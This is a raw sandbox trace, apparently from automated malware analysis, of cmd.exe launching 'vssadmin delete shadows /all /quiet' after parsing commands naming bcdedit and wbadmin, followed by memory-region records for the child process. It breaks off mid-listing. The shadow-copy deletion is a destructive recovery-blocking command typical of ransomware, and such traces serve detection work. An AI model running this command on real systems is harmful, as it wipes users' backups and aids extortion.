[0080.432] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0080.432] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0080.432] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0080.432] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0080.432] GetProcessHeap () returned 0x3f0000 [0080.432] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb0) returned 0x3f1460 [0080.432] GetProcessHeap () returned 0x3f0000 [0080.432] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x20) returned 0x404880 [0080.544] GetProcessHeap () returned 0x3f0000 [0080.544] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x3f1520 [0080.545] GetProcessHeap () returned 0x3f0000 [0080.545] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb0) returned 0x3f1580 [0080.546] _wcsicmp (_String1="wbadmin", _String2=")") returned 78 [0080.546] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17 [0080.546] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17 [0080.546] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14 [0080.546] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14 [0080.546] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5 [0080.546] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5 [0080.546] GetProcessHeap () returned 0x3f0000 [0080.546] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb0) returned 0x3f1640 [0080.546] GetProcessHeap () returned 0x3f0000 [0080.546] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x20) returned 0x4048b0 [0080.546] GetProcessHeap () returned 0x3f0000 [0080.547] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x3e) returned 0x3f1700 [0080.547] GetConsoleTitleW (in: lpConsoleTitle=0x21f820, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0080.548] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0080.548] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0080.548] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0080.548] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0080.548] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0080.548] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0080.548] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0080.548] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0080.548] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0080.548] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0080.548] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0080.548] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0080.548] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0080.548] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0080.548] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0080.548] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0080.548] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0080.549] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0080.549] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0080.549] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0080.549] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0080.549] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0080.549] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0080.549] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0080.549] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0080.549] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0080.549] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0080.549] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0080.549] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0080.549] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0080.549] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0080.549] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0080.549] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0080.549] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0080.549] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0080.549] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0080.549] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0080.549] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0080.549] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0080.549] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0080.549] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0080.549] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0080.549] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0080.549] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0080.549] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0080.549] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0080.549] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0080.549] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0080.550] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0080.550] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0080.550] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0080.550] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0080.550] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0080.550] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0080.550] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0080.550] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0080.550] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0080.550] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0080.550] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0080.550] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0080.550] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0080.550] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0080.550] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0080.550] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0080.550] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0080.550] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0080.550] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0080.550] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0080.550] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0080.550] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0080.550] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0080.550] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0080.550] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0080.550] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0080.550] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0080.550] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0080.550] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0080.550] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0080.550] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0080.551] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0080.551] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0080.551] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0080.551] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0080.551] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0080.551] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0080.551] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0080.551] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0080.551] GetProcessHeap () returned 0x3f0000 [0080.551] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x218) returned 0x3f1750 [0080.551] GetProcessHeap () returned 0x3f0000 [0080.551] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x5c) returned 0x3f1970 [0080.551] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0080.552] GetProcessHeap () returned 0x3f0000 [0080.552] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x420) returned 0x3f19e0 [0080.552] SetErrorMode (uMode=0x0) returned 0x0 [0080.552] SetErrorMode (uMode=0x1) returned 0x0 [0080.552] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f19f0, lpFilePart=0x21f0b0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x21f0b0*="Desktop") returned 0x1a [0080.552] SetErrorMode (uMode=0x0) returned 0x1 [0080.552] GetProcessHeap () returned 0x3f0000 [0080.552] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x3f19e0, Size=0x58) returned 0x3f19e0 [0080.552] GetProcessHeap () returned 0x3f0000 [0080.552] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x3f19e0) returned 0x58 [0080.552] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a85f360, nSize=0x2000 | out: lpBuffer="") returned 0x8f [0080.552] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0080.553] GetProcessHeap () returned 0x3f0000 [0080.553] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x16a) returned 0x3f1a50 [0080.553] GetProcessHeap () returned 0x3f0000 [0080.553] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x2c4) returned 0x40ae10 [0080.558] GetProcessHeap () returned 0x3f0000 [0080.558] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x40ae10, Size=0x16c) returned 0x40ae10 [0080.558] GetProcessHeap () returned 0x3f0000 [0080.558] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x40ae10) returned 0x16c [0080.558] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a85f360, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0080.558] GetProcessHeap () returned 0x3f0000 [0080.558] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xe8) returned 0x3f1bd0 [0080.558] GetProcessHeap () returned 0x3f0000 [0080.558] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x3f1bd0, Size=0x7e) returned 0x3f1bd0 [0080.558] GetProcessHeap () returned 0x3f0000 [0080.558] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x3f1bd0) returned 0x7e [0080.569] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0080.569] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\vssadmin.*" (normalized: "c:\\users\\keecfmwgj\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x21ee20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ee20) returned 0xffffffffffffffff [0080.570] GetLastError () returned 0x2 [0080.570] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\vssadmin" (normalized: "c:\\users\\keecfmwgj\\desktop\\vssadmin"), fInfoLevelId=0x1, lpFindFileData=0x21ee20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ee20) returned 0xffffffffffffffff [0080.570] GetLastError () returned 0x2 [0080.570] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0080.570] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\system32\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x21ee20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ee20) returned 0x3f1c60 [0080.570] GetProcessHeap () returned 0x3f0000 [0080.570] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x28) returned 0x4048e0 [0080.570] FindClose (in: hFindFile=0x3f1c60 | out: hFindFile=0x3f1c60) returned 1 [0080.571] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\system32\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x21ee20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ee20) returned 0xffffffffffffffff [0080.571] GetLastError () returned 0x2 [0080.571] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\system32\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x21ee20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ee20) returned 0x3f1c60 [0080.571] GetProcessHeap () returned 0x3f0000 [0080.571] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x4048e0, Size=0x8) returned 0x408c20 [0080.571] FindClose (in: hFindFile=0x3f1c60 | out: hFindFile=0x3f1c60) returned 1 [0080.571] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0080.571] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0080.571] GetConsoleTitleW (in: lpConsoleTitle=0x21f370, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0080.571] InitializeProcThreadAttributeList (in: lpAttributeList=0x21f128, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x21f0e8 | out: lpAttributeList=0x21f128, lpSize=0x21f0e8) returned 1 [0080.571] UpdateProcThreadAttribute (in: lpAttributeList=0x21f128, dwFlags=0x0, Attribute=0x60001, lpValue=0x21f0d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x21f128, lpPreviousValue=0x0) returned 1 [0080.571] GetStartupInfoW (in: lpStartupInfo=0x21f240 | out: lpStartupInfo=0x21f240*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0080.571] GetProcessHeap () returned 0x3f0000 [0080.572] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x20) returned 0x4048e0 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0080.572] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0080.573] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0080.573] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0080.573] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0080.573] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0080.573] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0080.573] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0080.573] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0080.573] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0080.573] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0080.573] GetProcessHeap () returned 0x3f0000 [0080.574] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4048e0 | out: hHeap=0x3f0000) returned 1 [0080.574] GetProcessHeap () returned 0x3f0000 [0080.574] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x12) returned 0x408c40 [0080.574] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0080.577] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\kEecfMwgj\\Desktop", lpStartupInfo=0x21f160*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x21f110 | out: lpCommandLine="vssadmin delete shadows /all /quiet ", lpProcessInformation=0x21f110*(hProcess=0x58, hThread=0x54, dwProcessId=0xff0, dwThreadId=0xff4)) returned 1 [0081.189] CloseHandle (hObject=0x54) returned 1 [0081.189] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0081.189] GetProcessHeap () returned 0x3f0000 [0081.189] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x40b940 | out: hHeap=0x3f0000) returned 1 [0081.189] GetEnvironmentStringsW () returned 0x40b160* [0081.189] GetProcessHeap () returned 0x3f0000 [0081.189] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb16) returned 0x40bc80 [0081.189] memcpy (in: _Dst=0x40bc80, _Src=0x40b160, _Size=0xb16 | out: _Dst=0x40bc80) returned 0x40bc80 [0081.189] FreeEnvironmentStringsW (penv=0x40b160) returned 1 [0081.189] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) Process: id = "3" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x44bac000" os_pid = "0xff0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xfcc" cmd_line = "vssadmin delete shadows /all /quiet " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f2de" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 645 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 646 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 647 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 648 start_va = 0x80000 end_va = 0xfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 649 start_va = 0x76f70000 end_va = 0x77118fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 650 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 651 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 652 start_va = 0xffe10000 end_va = 0xffe3cfff monitored = 0 entry_point = 0xffe30384 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\System32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe") Region: id = 653 start_va = 0x7feff290000 end_va = 0x7feff290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 654 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 655 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 656 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 657 start_va = 0x230000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 658 start_va = 0x76e50000 end_va = 0x76f6efff monitored = 0 entry_point = 0x76e65340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 659 start_va = 0x7fefd1c0000 end_va = 0x7fefd22bfff monitored = 0 entry_point = 0x7fefd1c2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 660 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 661 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 662 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 663 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 664 start_va = 0x100000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 665 start_va = 0x7fefe1d0000 end_va = 0x7fefe2aafff monitored = 0 entry_point = 0x7fefe1f0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 666 start_va = 0x7feff140000 end_va = 0x7feff1defff monitored = 0 entry_point = 0x7feff1425a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 667 start_va = 0x7fefeb40000 end_va = 0x7fefeb5efff monitored = 0 entry_point = 0x7fefeb460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 668 start_va = 0x7fefe4c0000 end_va = 0x7fefe5ecfff monitored = 0 entry_point = 0x7fefe50ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 669 start_va = 0x7fefaa90000 end_va = 0x7fefaaa8fff monitored = 0 entry_point = 0x7fefaa911a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 670 start_va = 0x76d50000 end_va = 0x76e49fff monitored = 0 entry_point = 0x76d6a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 671 start_va = 0x7fefe770000 end_va = 0x7fefe7d6fff monitored = 0 entry_point = 0x7fefe77b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 672 start_va = 0x7fefebb0000 end_va = 0x7fefebbdfff monitored = 0 entry_point = 0x7fefebb1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 673 start_va = 0x7fefe7e0000 end_va = 0x7fefe8a8fff monitored = 0 entry_point = 0x7fefe85a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 674 start_va = 0x7fef7410000 end_va = 0x7fef7426fff monitored = 0 entry_point = 0x7fef7411060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 675 start_va = 0x7fefef30000 end_va = 0x7feff132fff monitored = 0 entry_point = 0x7fefef53330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 676 start_va = 0x7fefe5f0000 end_va = 0x7fefe6c6fff monitored = 0 entry_point = 0x7fefe5f3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 677 start_va = 0x7fef7430000 end_va = 0x7fef75dffff monitored = 0 entry_point = 0x7fef7431010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 678 start_va = 0x170000 end_va = 0x21ffff monitored = 1 